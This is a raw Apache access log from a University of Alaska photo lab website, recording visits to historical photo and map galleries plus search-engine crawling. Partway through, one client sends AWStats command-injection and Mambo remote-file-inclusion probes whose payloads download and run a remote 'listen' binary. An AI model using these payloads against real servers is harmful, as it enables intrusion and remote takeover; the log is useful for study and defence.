81.161.144.220 - - [16/Dec/2005:13:21:41 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://images.google.dk/imgres?imgurl=http://photolab.elmer.uaf.edu/store/photos/largejpegs/(040)1958-1026-01700.jpg&imgrefurl=http://photolab.elmer.uaf.edu/store/people.html&h=1000&w=762&sz=136&tbnid=muofWG5zZScJ:&tbnh=149&tbnw=113&hl=da&prev=/images%3Fq%3Deskimo%26svnum%3D10%26hl%3Dda%26lr%3D%26client%3Dfirefox-a%26rls%3Dorg.mozilla:da-DK:official%26sa%3DN&frame=small" "Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.8) Gecko/20051111 Firefox/1.5"
208.62.125.146 - - [16/Dec/2005:13:28:52 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://www.beusichem.web-log.nl/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
216.106.60.130 - - [16/Dec/2005:13:32:52 -0900] "GET /store/panoramas.html HTTP/1.1" 301 354 "http://search.yahoo.com/search?p=o.d.goetz&sm=Yahoo%21+Search&toggle=1&ei=UTF-8&pstart=1&fr=FP-tab-web-t&b=11" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.136.104.246 - - [16/Dec/2005:13:34:03 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://www.beusichem.web-log.nl/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.40.27.67 - - [16/Dec/2005:13:34:51 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://profile.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=23572191" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1"
66.249.65.35 - - [16/Dec/2005:13:35:19 -0900] "HEAD /store/photos/smalljpegs/(119)1968-0069-02524.jpg HTTP/1.1" 301 - "-" "Googlebot-Image/1.0"
66.249.65.35 - - [16/Dec/2005:13:36:29 -0900] "HEAD /store/photos/thumbnails/1997-0165-00010.jpg HTTP/1.1" 301 - "-" "Googlebot-Image/1.0"
68.142.251.148 - - [16/Dec/2005:13:36:34 -0900] "GET /robots.txt HTTP/1.0" 200 96 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
68.142.251.22 - - [16/Dec/2005:13:36:34 -0900] "GET /store/panoramas.html HTTP/1.0" 301 354 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
71.109.149.102 - - [16/Dec/2005:13:42:38 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://www.beusichem.web-log.nl/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.142.249.89 - - [16/Dec/2005:13:42:42 -0900] "GET /store/allphotos2.html HTTP/1.0" 301 355 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
81.70.93.228 - - [16/Dec/2005:13:42:51 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.0" 301 382 "http://www.beusichem.web-log.nl/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; NN5.0.600.15; SV1; .NET CLR 2.0.50727)"
66.82.9.59 - - [16/Dec/2005:13:43:01 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://images.google.com/imgres?imgurl=http://img.photobucket.com/albums/v434/beus/kippevel.jpg&imgrefurl=http://www.beusichem.web-log.nl/&h=400&w=533&sz=46&tbnid=y6Q-pWdj8tUJ:&tbnh=96&tbnw=129&hl=en&start=1&prev=/images%3Fq%3Dbend%2Bover%26svnum%3D10%26hl%3Den%26lr%3D" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.82.9.59 - - [16/Dec/2005:13:43:09 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
64.240.205.245 - - [16/Dec/2005:13:52:49 -0900] "GET /index_files/lib.css HTTP/1.1" 200 2634 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3200.html" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
64.240.205.245 - - [16/Dec/2005:13:52:50 -0900] "GET /index_files/title.jpg HTTP/1.1" 200 5438 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3200.html" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
64.240.205.245 - - [16/Dec/2005:13:52:50 -0900] "GET /index_files/apr.jpg HTTP/1.1" 200 6015 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3200.html" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
64.240.205.245 - - [16/Dec/2005:13:52:51 -0900] "GET /index_files/empty.gif HTTP/1.1" 200 45 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3200.html" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
64.240.205.245 - - [16/Dec/2005:13:52:51 -0900] "GET /index_files/small.dps.jpg HTTP/1.1" 200 5830 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3200.html" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
64.240.205.245 - - [16/Dec/2005:13:52:49 -0900] "GET /gallery/maps/mapg3200.html HTTP/1.1" 200 17235 "http://images.google.com/imgres?imgurl=http://photolab.elmer.uaf.edu/gallery/maps/G3200/large/G3200%2520%255B1700%255D.jpg&imgrefurl=http://photolab.elmer.uaf.edu/gallery/maps/mapg3200.html&h=894&w=1200&sz=300&tbnid=seMXFkFak7gJ:&tbnh=111&tbnw=150&hl=en&start=19&prev=/images%3Fq%3Dmaps%2Bof%2Bthe%2Bglobe%26svnum%3D10%26hl%3Den%26lr%3D%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official_s%26sa%3DG" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
64.240.205.245 - - [16/Dec/2005:13:52:51 -0900] "GET /index_files/small.jpg HTTP/1.1" 200 2294 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3200.html" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
64.240.205.245 - - [16/Dec/2005:13:52:51 -0900] "GET /index_files/bar.gif HTTP/1.1" 200 342 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3200.html" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
64.240.205.245 - - [16/Dec/2005:13:52:51 -0900] "GET /gallery/maps/G3200/large/G3200%20%5B1700%5D.jpg HTTP/1.1" 200 306989 "http://images.google.com/imgres?imgurl=http://photolab.elmer.uaf.edu/gallery/maps/G3200/large/G3200%2520%255B1700%255D.jpg&imgrefurl=http://photolab.elmer.uaf.edu/gallery/maps/mapg3200.html&h=894&w=1200&sz=300&tbnid=seMXFkFak7gJ:&tbnh=111&tbnw=150&hl=en&prev=/images%3Fq%3Dmaps%2Bof%2Bthe%2Bglobe%26svnum%3D10%26hl%3Den%26lr%3D%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official_s%26sa%3DG&frame=small" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
64.240.205.245 - - [16/Dec/2005:13:53:17 -0900] "GET /gallery/maps/mapg3200.html HTTP/1.1" 206 851 "http://images.google.com/imgres?imgurl=http://photolab.elmer.uaf.edu/gallery/maps/G3200/large/G3200%2520%255B1700%255D.jpg&imgrefurl=http://photolab.elmer.uaf.edu/gallery/maps/mapg3200.html&h=894&w=1200&sz=300&tbnid=seMXFkFak7gJ:&tbnh=111&tbnw=150&hl=en&start=19&prev=/images%3Fq%3Dmaps%2Bof%2Bthe%2Bglobe%26svnum%3D10%26hl%3Den%26lr%3D%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official_s%26sa%3DG" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
64.240.205.245 - - [16/Dec/2005:13:53:17 -0900] "GET /index_files/small.jpg HTTP/1.1" 200 2294 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3200.html" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
64.240.205.245 - - [16/Dec/2005:13:53:17 -0900] "GET /index_files/small_003.jpg HTTP/1.1" 200 1521 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3200.html" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
64.240.205.245 - - [16/Dec/2005:13:53:17 -0900] "GET /index_files/small_002.jpg HTTP/1.1" 200 1351 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3200.html" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
69.50.56.154 - - [16/Dec/2005:13:56:02 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://www.beusichem.web-log.nl/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
70.230.96.207 - - [16/Dec/2005:13:56:14 -0900] "GET /index_files/aprbrown.jpg HTTP/1.1" 200 5509 "http://www.alaska.net/~johnd/urban/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.1.02b)"
141.213.212.84 - - [16/Dec/2005:13:57:18 -0900] "GET /store/photos/largejpegs/(051)1981-0107-00008.jpg HTTP/1.1" 301 382 "http://www.gofuckyourself.com/showthread.php?t=489394&highlight=gold" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
66.249.65.35 - - [16/Dec/2005:13:57:58 -0900] "HEAD /store/photos/thumbnails/1972-0071-03234.jpg HTTP/1.1" 301 - "-" "Googlebot-Image/1.0"
202.108.1.7 - - [16/Dec/2005:14:01:36 -0900] "GET / HTTP/1.0" 200 8969 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
202.108.1.7 - - [16/Dec/2005:14:01:38 -0900] "GET /index_files/lib.css HTTP/1.0" 200 2634 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
84.152.224.145 - - [16/Dec/2005:14:03:02 -0900] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 500 622 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.152.224.145 - - [16/Dec/2005:14:03:04 -0900] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.152.224.145 - - [16/Dec/2005:14:03:05 -0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.152.224.145 - - [16/Dec/2005:14:03:07 -0900] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.152.224.145 - - [16/Dec/2005:14:03:08 -0900] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.152.224.145 - - [16/Dec/2005:14:03:10 -0900] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.152.224.145 - - [16/Dec/2005:14:03:11 -0900] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.152.224.145 - - [16/Dec/2005:14:03:13 -0900] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
217.42.249.21 - - [16/Dec/2005:14:03:50 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://www.beusichem.web-log.nl/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
38.112.6.182 - - [16/Dec/2005:14:04:22 -0900] "GET /gallery/19950244/16/pages/1995-0244-01616.html HTTP/1.0" 404 342 "-" "voyager/1.0"
66.249.65.35 - - [16/Dec/2005:14:06:26 -0900] "HEAD /store/photos/smalljpegs/(046)1958-1026-02232.jpg HTTP/1.1" 301 - "-" "Googlebot-Image/1.0"
69.42.0.120 - - [16/Dec/2005:14:08:45 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://comments.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=188341&Mytoken=FC281450-149A-62A5-511BA445352A428B2488629" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
66.249.65.35 - - [16/Dec/2005:14:10:46 -0900] "HEAD /store/photos/largejpegs/(047)1958-1026-01592.jpg HTTP/1.1" 301 - "-" "Googlebot-Image/1.0"
68.142.250.43 - - [16/Dec/2005:14:15:32 -0900] "GET /gallery/photos/20030024/0/index_2.html HTTP/1.0" 200 7242 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
211.134.225.234 - - [16/Dec/2005:14:15:57 -0900] "GET /gallery/maps/mapg3300.html HTTP/1.1" 200 21851 "http://www.worldmapfinder.com/Map_Detail.php?MAP=549&FN=G3300%20%5B1780%5D%20C66.jpg&MW=1200&MH=896&FS=242&FT=jpg&WO=0&CE=4&CO=0&CI=0&IT=0&LC=3&PG=1&CS=iso-8859-1&FU=http://photolab.elmer.uaf.edu/gallery/maps/G3300/large/G3300%20%5B1780%5D%20C66.jpg&SU=http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:15:57 -0900] "GET /index_files/lib.css HTTP/1.1" 200 2634 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:15:58 -0900] "GET /index_files/title.jpg HTTP/1.1" 200 5438 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:15:58 -0900] "GET /index_files/empty.gif HTTP/1.1" 200 45 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:15:58 -0900] "GET /index_files/apr.jpg HTTP/1.1" 200 6015 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:15:58 -0900] "GET /index_files/small.dps.jpg HTTP/1.1" 200 5830 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:15:58 -0900] "GET /index_files/small.jpg HTTP/1.1" 200 2294 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:15:58 -0900] "GET /index_files/small_002.jpg HTTP/1.1" 200 1351 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:15:58 -0900] "GET /index_files/small_003.jpg HTTP/1.1" 200 1521 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:15:59 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B1590%5D%20P67.jpg HTTP/1.1" 200 14993 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:15:59 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B1625%5D%20E47.jpg HTTP/1.1" 200 17451 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:15:59 -0900] "GET /gallery/maps/G3300/small/G3300%201755%20B431.jpg HTTP/1.1" 200 14901 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:15:59 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B1740_%5D.jpg HTTP/1.1" 200 20134 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:00 -0900] "GET /gallery/maps/G3300/small/G3300%201774%20D861.jpg HTTP/1.1" 200 14984 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:00 -0900] "GET /gallery/maps/G3300/small/G3300%201772%20R62.jpg HTTP/1.1" 200 15425 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:01 -0900] "GET /gallery/maps/G3300/small/G3300%201775%20R621.jpg HTTP/1.1" 200 14889 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:01 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B1779%5D%20C662.jpg HTTP/1.1" 200 15796 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:01 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B1780_%5D%20C66a.jpg HTTP/1.1" 200 14727 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:01 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B1780%5D%20C66.jpg HTTP/1.1" 200 17169 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:02 -0900] "GET /gallery/maps/G3300/small/G3300%201783%20R62.jpg HTTP/1.1" 200 15342 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:02 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B1787%5D%20B66.jpg HTTP/1.1" 200 14342 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:02 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B1786_%5D%20B691.jpg HTTP/1.1" 200 16623 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:03 -0900] "GET /gallery/maps/G3300/small/G3300%201797%20N43.jpg HTTP/1.1" 200 15960 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:03 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B1822%5D%20F55.jpg HTTP/1.1" 200 16603 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:03 -0900] "GET /gallery/maps/G3300/small/G3300%201841%20S75.jpg HTTP/1.1" 200 17336 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:04 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B1848_%5D%20C61.jpg HTTP/1.1" 200 16536 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:04 -0900] "GET /gallery/maps/G3300/small/G3300%201849%20R321.jpg HTTP/1.1" 200 15980 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:05 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B184-_%5D%20L681.jpg HTTP/1.1" 200 15119 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:06 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B1851%5D%20R36.jpg HTTP/1.1" 200 16233 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:06 -0900] "GET /gallery/maps/G3300/small/G3321%20P5%201852%20G73.jpg HTTP/1.1" 200 14278 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:07 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B1854_%5D%20B36.jpg HTTP/1.1" 200 14541 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:07 -0900] "GET /gallery/maps/G3300/small/G3300%201855%20C64.jpg HTTP/1.1" 200 16222 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:08 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B1857_%5D%20B36.jpg HTTP/1.1" 200 15604 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:08 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B1855_%5D%20C641.jpg HTTP/1.1" 200 17024 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:08 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B1862_%5D%20B36.jpg HTTP/1.1" 200 14330 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:08 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B1858%5D%20B361.jpg HTTP/1.1" 200 14683 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:09 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B1864%5D%20J61.jpg HTTP/1.1" 200 15913 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:09 -0900] "GET /gallery/maps/G3300/small/G3300%20%5B1868%5D%20C671.jpg HTTP/1.1" 200 15494 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:09 -0900] "GET /gallery/maps/G3300/small/G3300%201872%20W51.jpg HTTP/1.1" 200 17525 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:10 -0900] "GET /index_files/bluebear.gif HTTP/1.1" 200 1263 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:10 -0900] "GET /gallery/maps/G3300/small/G3312%20Y81%20%5B1898_%5D%20D5.jpg HTTP/1.1" 200 16571 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:10 -0900] "GET /index_files/sitemap.gif HTTP/1.1" 200 1503 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
211.134.225.234 - - [16/Dec/2005:14:16:10 -0900] "GET /index_files/bar.gif HTTP/1.1" 200 342 "http://photolab.elmer.uaf.edu/gallery/maps/mapg3300.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
81.207.48.147 - - [16/Dec/2005:14:16:11 -0900] "GET /store/photos/largejpegs/(040)1958-1026-01700.jpg HTTP/1.1" 301 382 "http://beusichem.web-log.nl/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
